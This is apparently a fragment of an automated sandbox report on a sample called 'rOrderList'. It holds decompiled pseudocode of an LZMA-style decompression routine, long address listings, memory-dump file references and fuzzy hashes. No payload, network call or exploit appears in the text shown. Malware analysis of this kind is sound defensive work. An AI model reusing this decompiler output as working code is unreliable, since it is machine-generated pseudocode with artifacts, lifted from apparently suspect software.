                                                                                      												__eax = __eax + 1;
                                                                                      												__edx = 0;
                                                                                      												_t415 = __eax %  *(__ebp - 0x74);
                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                      												__edx = _t415;
                                                                                      												__eax =  *(__ebp - 0x68);
                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      												__eflags =  *(__ebp - 0x30);
                                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                                      												 *(__ebp - 0x14) = _t415;
                                                                                      												if( *(__ebp - 0x30) > 0) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													L81:
                                                                                      													 *(__ebp - 0x88) = 2;
                                                                                      													goto L1;
                                                                                      												}
                                                                                      											}
                                                                                      											 *(__ebp - 0x88) = 0x1c;
                                                                                      											L170:
                                                                                      											_push(0x22);
                                                                                      											_pop(_t567);
                                                                                      											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                      											_t535 = 0;
                                                                                      											L172:
                                                                                      											return _t535;
                                                                                      									}
                                                                                      								}
                                                                                      								L171:
                                                                                      								_t535 = _t534 | 0xffffffff;
                                                                                      								goto L172;
                                                                                      							}
                                                                                      						}
                                                                                      						__eax =  *(__ebp - 0x50);
                                                                                      						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      						__eax =  *(__ebp - 0x58);
                                                                                      						__esi = __edx + __eax;
                                                                                      						 *(__ebp - 0x54) = __esi;
                                                                                      						__ax =  *__esi;
                                                                                      						__edi = __ax & 0x0000ffff;
                                                                                      						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      						if( *(__ebp - 0xc) >= __ecx) {
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      							__cx = __ax;
                                                                                      							__cx = __ax >> 5;
                                                                                      							__eax = __eax - __ecx;
                                                                                      							__edx = __edx + 1;
                                                                                      							 *__esi = __ax;
                                                                                      							 *(__ebp - 0x50) = __edx;
                                                                                      						} else {
                                                                                      							 *(__ebp - 0x10) = __ecx;
                                                                                      							0x800 = 0x800 - __edi;
                                                                                      							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      							 *__esi = __cx;
                                                                                      						}
                                                                                      						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      							goto L148;
                                                                                      						} else {
                                                                                      							goto L146;
                                                                                      						}
                                                                                      					}
                                                                                      					goto L1;
                                                                                      				}
                                                                                      			}








                                                                                      0x00000000
                                                                                      0x00407291
                                                                                      0x00407291
                                                                                      0x00407295
                                                                                      0x004072ba
                                                                                      0x004072c4
                                                                                      0x00000000
                                                                                      0x00407297
                                                                                      0x00407297
                                                                                      0x0040729a
                                                                                      0x0040729e
                                                                                      0x004072a1
                                                                                      0x004072a4
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072ab
                                                                                      0x00407385
                                                                                      0x00407385
                                                                                      0x0040738c
                                                                                      0x0040738c
                                                                                      0x0040738f
                                                                                      0x00407396
                                                                                      0x004073c3
                                                                                      0x004073c7
                                                                                      0x00407427
                                                                                      0x0040742a
                                                                                      0x0040742f
                                                                                      0x00407430
                                                                                      0x00407432
                                                                                      0x00407434
                                                                                      0x00407437
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00406adf
                                                                                      0x00406adf
                                                                                      0x00406adf
                                                                                      0x00406ae8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee
                                                                                      0x00000000
                                                                                      0x00406af9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b02
                                                                                      0x00406b05
                                                                                      0x00406b08
                                                                                      0x00406b0c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b12
                                                                                      0x00406b15
                                                                                      0x00406b17
                                                                                      0x00406b18
                                                                                      0x00406b1b
                                                                                      0x00406b1d
                                                                                      0x00406b1e
                                                                                      0x00406b20
                                                                                      0x00406b23
                                                                                      0x00406b28
                                                                                      0x00406b2d
                                                                                      0x00406b36
                                                                                      0x00406b49
                                                                                      0x00406b4c
                                                                                      0x00406b58
                                                                                      0x00406b80
                                                                                      0x00406b82
                                                                                      0x00406b90
                                                                                      0x00406b90
                                                                                      0x00406b94
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b84
                                                                                      0x00406b87
                                                                                      0x00406b88
                                                                                      0x00406b88
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b5e
                                                                                      0x00406b63
                                                                                      0x00406b63
                                                                                      0x00406b6c
                                                                                      0x00406b74
                                                                                      0x00406b77
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b9a
                                                                                      0x00406b9a
                                                                                      0x00406b9e
                                                                                      0x0040744a
                                                                                      0x00000000
                                                                                      0x0040744a
                                                                                      0x00406ba7
                                                                                      0x00406bb7
                                                                                      0x00406bba
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bc0
                                                                                      0x00406bc4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bc6
                                                                                      0x00406bcc
                                                                                      0x00406bf6
                                                                                      0x00406bfc
                                                                                      0x00406c03
                                                                                      0x00000000
                                                                                      0x00406c03
                                                                                      0x00406bd2
                                                                                      0x00406bd5
                                                                                      0x00406bda
                                                                                      0x00406bda
                                                                                      0x00406be5
                                                                                      0x00406bed
                                                                                      0x00406bf0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c35
                                                                                      0x00406c3b
                                                                                      0x00406c3e
                                                                                      0x00406c4b
                                                                                      0x00406c53
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c0a
                                                                                      0x00406c0a
                                                                                      0x00406c0e
                                                                                      0x00407459
                                                                                      0x00000000
                                                                                      0x00407459
                                                                                      0x00406c1a
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c28
                                                                                      0x00406c2b
                                                                                      0x00406c2e
                                                                                      0x00406c33
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072d0
                                                                                      0x004072d6
                                                                                      0x004072dc
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072ff
                                                                                      0x0040730a
                                                                                      0x0040730a
                                                                                      0x0040730c
                                                                                      0x004072de
                                                                                      0x004072de
                                                                                      0x004072ed
                                                                                      0x004072f1
                                                                                      0x004072f1
                                                                                      0x00407316
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407318
                                                                                      0x0040731c
                                                                                      0x004074cb
                                                                                      0x00000000
                                                                                      0x004074cb
                                                                                      0x00407328
                                                                                      0x0040732f
                                                                                      0x00407337
                                                                                      0x0040733a
                                                                                      0x0040733d
                                                                                      0x0040733d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c5b
                                                                                      0x00406c5d
                                                                                      0x00406c60
                                                                                      0x00406cd1
                                                                                      0x00406cd4
                                                                                      0x00406cd7
                                                                                      0x00406cde
                                                                                      0x00406ce8
                                                                                      0x00000000
                                                                                      0x00406ce8
                                                                                      0x00406c62
                                                                                      0x00406c66
                                                                                      0x00406c69
                                                                                      0x00406c6b
                                                                                      0x00406c6e
                                                                                      0x00406c71
                                                                                      0x00406c73
                                                                                      0x00406c76
                                                                                      0x00406c78
                                                                                      0x00406c7d
                                                                                      0x00406c80
                                                                                      0x00406c83
                                                                                      0x00406c87
                                                                                      0x00406c8e
                                                                                      0x00406c91
                                                                                      0x00406c98
                                                                                      0x00406c9c
                                                                                      0x00406ca4
                                                                                      0x00406ca4
                                                                                      0x00406ca4
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406ca8
                                                                                      0x00406cab
                                                                                      0x00406cc9
                                                                                      0x00406ccb
                                                                                      0x00000000
                                                                                      0x00406cad
                                                                                      0x00406cad
                                                                                      0x00406cb0
                                                                                      0x00406cb3
                                                                                      0x00406cb6
                                                                                      0x00406cb8
                                                                                      0x00406cb8
                                                                                      0x00406cb8
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc0
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00000000
                                                                                      0x00406cc4
                                                                                      0x00000000
                                                                                      0x00406efa
                                                                                      0x00406efe
                                                                                      0x00406f1c
                                                                                      0x00406f1f
                                                                                      0x00406f26
                                                                                      0x00406f29
                                                                                      0x00406f2c
                                                                                      0x00406f2f
                                                                                      0x00406f32
                                                                                      0x00406f35
                                                                                      0x00406f37
                                                                                      0x00406f3e
                                                                                      0x00406f3f
                                                                                      0x00406f41
                                                                                      0x00406f44
                                                                                      0x00406f47
                                                                                      0x00406f4a
                                                                                      0x00406f4a
                                                                                      0x00406f4f
                                                                                      0x00000000
                                                                                      0x00406f4f
                                                                                      0x00406f00
                                                                                      0x00406f03
                                                                                      0x00406f06
                                                                                      0x00406f10
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f64
                                                                                      0x00406f68
                                                                                      0x00406f8b
                                                                                      0x00406f8e
                                                                                      0x00406f91
                                                                                      0x00406f9b
                                                                                      0x00406f6a
                                                                                      0x00406f6a
                                                                                      0x00406f6d
                                                                                      0x00406f70
                                                                                      0x00406f73
                                                                                      0x00406f80
                                                                                      0x00406f83
                                                                                      0x00406f83
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fa7
                                                                                      0x00406fab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fb1
                                                                                      0x00406fb5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fbb
                                                                                      0x00406fbd
                                                                                      0x00406fc1
                                                                                      0x00406fc1
                                                                                      0x00406fc4
                                                                                      0x00406fc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407018
                                                                                      0x0040701c
                                                                                      0x00407023
                                                                                      0x00407026
                                                                                      0x00407029
                                                                                      0x00407033
                                                                                      0x00000000
                                                                                      0x00407033
                                                                                      0x0040701e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040703f
                                                                                      0x00407043
                                                                                      0x0040704a
                                                                                      0x0040704d
                                                                                      0x00407050
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407053
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x00407059
                                                                                      0x0040705c
                                                                                      0x0040705f
                                                                                      0x00407062
                                                                                      0x00407062
                                                                                      0x00407065
                                                                                      0x0040706c
                                                                                      0x00407071
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070ff
                                                                                      0x004070ff
                                                                                      0x00407103
                                                                                      0x004074a1
                                                                                      0x00000000
                                                                                      0x004074a1
                                                                                      0x00407109
                                                                                      0x0040710c
                                                                                      0x0040710f
                                                                                      0x00407113
                                                                                      0x00407116
                                                                                      0x0040711c
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x00407121
                                                                                      0x00407124
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cf4
                                                                                      0x00406cf4
                                                                                      0x00406cf8
                                                                                      0x00407465
                                                                                      0x00000000
                                                                                      0x00407465
                                                                                      0x00406cfe
                                                                                      0x00406d01
                                                                                      0x00406d04
                                                                                      0x00406d08
                                                                                      0x00406d0b
                                                                                      0x00406d11
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d16
                                                                                      0x00406d19
                                                                                      0x00406d19
                                                                                      0x00406d1c
                                                                                      0x00406d1f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d25
                                                                                      0x00406d2b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d31
                                                                                      0x00406d31
                                                                                      0x00406d35
                                                                                      0x00406d38
                                                                                      0x00406d3b
                                                                                      0x00406d3e
                                                                                      0x00406d41
                                                                                      0x00406d42
                                                                                      0x00406d45
                                                                                      0x00406d47
                                                                                      0x00406d4d
                                                                                      0x00406d50
                                                                                      0x00406d53
                                                                                      0x00406d56
                                                                                      0x00406d59
                                                                                      0x00406d5c
                                                                                      0x00406d5f
                                                                                      0x00406d7b
                                                                                      0x00406d7e
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d8b
                                                                                      0x00406d8f
                                                                                      0x00406d91
                                                                                      0x00406d95
                                                                                      0x00406d61
                                                                                      0x00406d61
                                                                                      0x00406d65
                                                                                      0x00406d6d
                                                                                      0x00406d72
                                                                                      0x00406d74
                                                                                      0x00406d76
                                                                                      0x00406d76
                                                                                      0x00406d98
                                                                                      0x00406d9f
                                                                                      0x00406da2
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406dad
                                                                                      0x00406dad
                                                                                      0x00406db1
                                                                                      0x00407471
                                                                                      0x00000000
                                                                                      0x00407471
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbd
                                                                                      0x00406dc1
                                                                                      0x00406dc4
                                                                                      0x00406dca
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcf
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406dda
                                                                                      0x00406ddd
                                                                                      0x00406de0
                                                                                      0x00406de3
                                                                                      0x00406de6
                                                                                      0x00406de9
                                                                                      0x00406dec
                                                                                      0x00406def
                                                                                      0x00406df2
                                                                                      0x00406df5
                                                                                      0x00406df8
                                                                                      0x00406e10
                                                                                      0x00406e13
                                                                                      0x00406e16
                                                                                      0x00406e19
                                                                                      0x00406e19
                                                                                      0x00406e1c
                                                                                      0x00406e20
                                                                                      0x00406e22
                                                                                      0x00406dfa
                                                                                      0x00406dfa
                                                                                      0x00406e02
                                                                                      0x00406e07
                                                                                      0x00406e09
                                                                                      0x00406e0b
                                                                                      0x00406e0b
                                                                                      0x00406e25
                                                                                      0x00406e2c
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00406e2f
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e71
                                                                                      0x00406e71
                                                                                      0x00406e75
                                                                                      0x0040747d
                                                                                      0x00000000
                                                                                      0x0040747d
                                                                                      0x00406e7b
                                                                                      0x00406e7e
                                                                                      0x00406e81
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8e
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e93
                                                                                      0x00406e96
                                                                                      0x00406e96
                                                                                      0x00406e9c
                                                                                      0x00406e3a
                                                                                      0x00406e3a
                                                                                      0x00406e3d
                                                                                      0x00000000
                                                                                      0x00406e3d
                                                                                      0x00406e9e
                                                                                      0x00406e9e
                                                                                      0x00406ea1
                                                                                      0x00406ea4
                                                                                      0x00406ea7
                                                                                      0x00406eaa
                                                                                      0x00406ead
                                                                                      0x00406eb0
                                                                                      0x00406eb3
                                                                                      0x00406eb6
                                                                                      0x00406eb9
                                                                                      0x00406ebc
                                                                                      0x00406ed4
                                                                                      0x00406ed7
                                                                                      0x00406eda
                                                                                      0x00406edd
                                                                                      0x00406edd
                                                                                      0x00406ee0
                                                                                      0x00406ee4
                                                                                      0x00406ee6
                                                                                      0x00406ebe
                                                                                      0x00406ebe
                                                                                      0x00406ec6
                                                                                      0x00406ecb
                                                                                      0x00406ecd
                                                                                      0x00406ecf
                                                                                      0x00406ecf
                                                                                      0x00406ee9
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00407182
                                                                                      0x00407182
                                                                                      0x00407186
                                                                                      0x004074ad
                                                                                      0x00000000
                                                                                      0x004074ad
                                                                                      0x0040718c
                                                                                      0x0040718f
                                                                                      0x00407192
                                                                                      0x00407196
                                                                                      0x00407199
                                                                                      0x0040719f
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f52
                                                                                      0x00406f52
                                                                                      0x00406f55
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734e
                                                                                      0x00407352
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407377
                                                                                      0x0040737e
                                                                                      0x00000000
                                                                                      0x0040737e
                                                                                      0x00407354
                                                                                      0x00407357
                                                                                      0x0040735a
                                                                                      0x0040735d
                                                                                      0x00407364
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040743f
                                                                                      0x00407442
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407079
                                                                                      0x0040707b
                                                                                      0x00407082
                                                                                      0x00407083
                                                                                      0x00407085
                                                                                      0x00407088
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407090
                                                                                      0x00407093
                                                                                      0x00407096
                                                                                      0x00407098
                                                                                      0x0040709a
                                                                                      0x0040709a
                                                                                      0x0040709b
                                                                                      0x0040709e
                                                                                      0x004070a5
                                                                                      0x004070a8
                                                                                      0x004070b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040739b
                                                                                      0x0040739b
                                                                                      0x0040739f
                                                                                      0x004074d7
                                                                                      0x00000000
                                                                                      0x004074d7
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x004073ab
                                                                                      0x004073af
                                                                                      0x004073b2
                                                                                      0x004073b8
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073bd
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070be
                                                                                      0x004070c1
                                                                                      0x004070f7
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x0040722a
                                                                                      0x0040722a
                                                                                      0x0040722d
                                                                                      0x0040722f
                                                                                      0x004074b9
                                                                                      0x00000000
                                                                                      0x004074b9
                                                                                      0x00407235
                                                                                      0x00407238
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040723e
                                                                                      0x00407242
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00000000
                                                                                      0x00407245
                                                                                      0x004070c3
                                                                                      0x004070c5
                                                                                      0x004070c7
                                                                                      0x004070c9
                                                                                      0x004070cc
                                                                                      0x004070cd
                                                                                      0x004070cf
                                                                                      0x004070d1
                                                                                      0x004070d4
                                                                                      0x004070d7
                                                                                      0x004070ed
                                                                                      0x004070f2
                                                                                      0x0040712a
                                                                                      0x0040712a
                                                                                      0x0040712e
                                                                                      0x0040715a
                                                                                      0x0040715c
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407169
                                                                                      0x0040716e
                                                                                      0x0040716e
                                                                                      0x00407170
                                                                                      0x00407173
                                                                                      0x0040717a
                                                                                      0x0040717d
                                                                                      0x004071aa
                                                                                      0x004071aa
                                                                                      0x004071ad
                                                                                      0x004071b0
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00000000
                                                                                      0x00407224
                                                                                      0x004071b2
                                                                                      0x004071b8
                                                                                      0x004071bb
                                                                                      0x004071be
                                                                                      0x004071c1
                                                                                      0x004071c4
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d3
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f2
                                                                                      0x004071f5
                                                                                      0x004071f7
                                                                                      0x004071fa
                                                                                      0x004071fc
                                                                                      0x004071fe
                                                                                      0x00407201
                                                                                      0x00407203
                                                                                      0x00407206
                                                                                      0x0040720a
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x004071d5
                                                                                      0x004071d5
                                                                                      0x004071dd
                                                                                      0x004071e2
                                                                                      0x004071e4
                                                                                      0x004071e7
                                                                                      0x004071e7
                                                                                      0x00407216
                                                                                      0x0040721d
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x0040721d
                                                                                      0x00407130
                                                                                      0x00407133
                                                                                      0x00407135
                                                                                      0x00407138
                                                                                      0x0040713b
                                                                                      0x0040713e
                                                                                      0x00407140
                                                                                      0x00407143
                                                                                      0x00407146
                                                                                      0x00407146
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x0040714c
                                                                                      0x00407153
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00407153
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070de
                                                                                      0x004070e1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e40
                                                                                      0x00406e40
                                                                                      0x00406e44
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00406e4a
                                                                                      0x00406e4d
                                                                                      0x00406e50
                                                                                      0x00406e53
                                                                                      0x00406e56
                                                                                      0x00406e59
                                                                                      0x00406e5c
                                                                                      0x00406e5e
                                                                                      0x00406e61
                                                                                      0x00406e64
                                                                                      0x00406e67
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fcb
                                                                                      0x00406fcb
                                                                                      0x00406fcf
                                                                                      0x00407495
                                                                                      0x00000000
                                                                                      0x00407495
                                                                                      0x00406fd5
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe3
                                                                                      0x00406fe6
                                                                                      0x00406fe9
                                                                                      0x00406fec
                                                                                      0x00406fef
                                                                                      0x00406ff2
                                                                                      0x00406ff3
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff8
                                                                                      0x00406ffb
                                                                                      0x00406ffe
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407004
                                                                                      0x00407006
                                                                                      0x00407006
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x0040724c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407252
                                                                                      0x00407255
                                                                                      0x00407258
                                                                                      0x0040725b
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407263
                                                                                      0x00407266
                                                                                      0x00407269
                                                                                      0x0040726c
                                                                                      0x0040726f
                                                                                      0x00407270
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407275
                                                                                      0x00407278
                                                                                      0x0040727b
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x00407285
                                                                                      0x00407287
                                                                                      0x0040728a
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x00407009
                                                                                      0x00407009
                                                                                      0x00000000
                                                                                      0x00407009
                                                                                      0x0040728a
                                                                                      0x004074bf
                                                                                      0x004074e1
                                                                                      0x004074e7
                                                                                      0x004074e9
                                                                                      0x004074f0
                                                                                      0x004074f2
                                                                                      0x004074f9
                                                                                      0x004074fd
                                                                                      0x00000000
                                                                                      0x00406aee
                                                                                      0x004074f6
                                                                                      0x004074f6
                                                                                      0x00000000
                                                                                      0x004074f6
                                                                                      0x00407343
                                                                                      0x004073c9
                                                                                      0x004073cf
                                                                                      0x004073d2
                                                                                      0x004073d5
                                                                                      0x004073d8
                                                                                      0x004073db
                                                                                      0x004073de
                                                                                      0x004073e1
                                                                                      0x004073e4
                                                                                      0x004073ea
                                                                                      0x00407403
                                                                                      0x00407406
                                                                                      0x00407409
                                                                                      0x0040740c
                                                                                      0x00407410
                                                                                      0x00407412
                                                                                      0x00407413
                                                                                      0x00407416
                                                                                      0x004073ec
                                                                                      0x004073ec
                                                                                      0x004073f4
                                                                                      0x004073f9
                                                                                      0x004073fb
                                                                                      0x004073fe
                                                                                      0x004073fe
                                                                                      0x00407420
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00407420
                                                                                      0x00000000
                                                                                      0x00407295

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                                                                      • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
                                                                                      • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                                                                      • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00406FA7() {
                                                                                      				unsigned short _t532;
                                                                                      				signed int _t533;
                                                                                      				void _t534;
                                                                                      				void* _t535;
                                                                                      				signed int _t536;
                                                                                      				signed int _t565;
                                                                                      				signed int _t568;
                                                                                      				signed int _t589;
                                                                                      				signed int* _t606;
                                                                                      				void* _t613;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                      						L89:
                                                                                      						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                      						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                      						L69:
                                                                                      						_t606 =  *(_t613 - 0x58);
                                                                                      						 *(_t613 - 0x84) = 0x12;
                                                                                      						L132:
                                                                                      						 *(_t613 - 0x54) = _t606;
                                                                                      						L133:
                                                                                      						_t532 =  *_t606;
                                                                                      						_t589 = _t532 & 0x0000ffff;
                                                                                      						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      						if( *(_t613 - 0xc) >= _t565) {
